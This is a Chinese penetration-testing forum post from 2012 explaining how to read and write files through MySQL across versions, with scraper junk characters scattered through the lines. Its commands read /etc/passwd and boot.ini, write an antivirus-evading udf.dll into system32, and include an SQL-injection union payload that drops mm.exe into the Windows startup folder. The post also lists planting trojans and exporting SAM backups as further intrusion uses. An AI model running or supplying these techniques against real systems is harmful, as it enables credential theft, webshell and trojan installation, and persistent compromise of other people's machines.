中国网络渗透测试联盟

标题: mysql下读取文件的几种方式 [打印本页]

作者: admin    时间: 2012-9-13 16:34
标题: mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
/ O2 D" v. ^( s( e+ D+ ?1 s9 |1 z. o思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
  l! o2 n9 \; f; X
4 ]7 o, N# d9 N$ Emysql3.x下
6 S/ [! b6 @- a( H7 y; F1 M
5 U+ l- R9 v5 D! n! |不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
+ Q$ k6 f, P$ j3 H
) |" N! L# y. _" c) J3 R' O- j/ Amysql>create table a (cmd text);
& A2 |: ~4 G1 {% _' y' Mmysql>load data infile 'c:\\boot.ini' into table a;
6 H' S+ W0 U: h  n4 Z! c% _$ x" Zmysql>select * from a;
* e% x- R% L9 _0 c
/ f: _, `! m1 g* `3 h3 \/ Nmysql4.x下 $ z. u0 o- v! v) h8 U
. s& t. I0 I; c" r4 O
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
7 k4 U' G" E1 y  Q$ e  i4 a2 _3 y. `+ h3 @
mysql>create table a (cmd text);
6 @1 {$ V! F, I1 ^! S* Omysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
3 u/ k# m( i" T0 Z9 mmysql>select * from a; ( Y2 N* X* }* R# G" e. M

) L( P) @; G) x9 Y  rmysql5.x下 1 _4 L# f* r- ^) d

2 A* ?, E/ F! j4 `& b6 J5 h在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 # {+ i' x% Q) i( d( N0 f

0 h4 w! _7 M' Bmysql>system cat /etc/passwd
  |4 O; h  n6 N, f$ j+ d7 i
1 T! b0 }4 h: N8 i6 F$ @, D
. s& h/ r$ P$ Z+ e0 smysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 , k) g- m$ R3 u

: f( ^3 w- j5 t' v8 a+ q
9 f) g  \. {  m! G9 A* G例:把免杀过的udf.dll文件插入系统目录 # h8 J8 A7 U* X. Z* T4 H) h
& y1 P  D) P- H4 C4 \
create table a (cmd LONGBLOB);
3 K& N2 i0 g2 [+ y& jinsert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
4 l6 d, B0 }4 u( l$ `  E) ZSELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
1 m) `- i4 @+ g) `
" ?& X* G2 \9 A" i7 z其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 0 ~  C2 o1 V: @9 V4 D9 B

% Y; @, N9 O( W$ ]: f8 R( `/ U3 h1 J1 D
  V: l( b! ]( q, m$ g6 t: [注入中的语法(未测试) + O/ A' ^) H4 E6 D2 r

' `4 ?; i$ z/ q8 t; r# Y& S- c, ^# H. Z5 Y
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2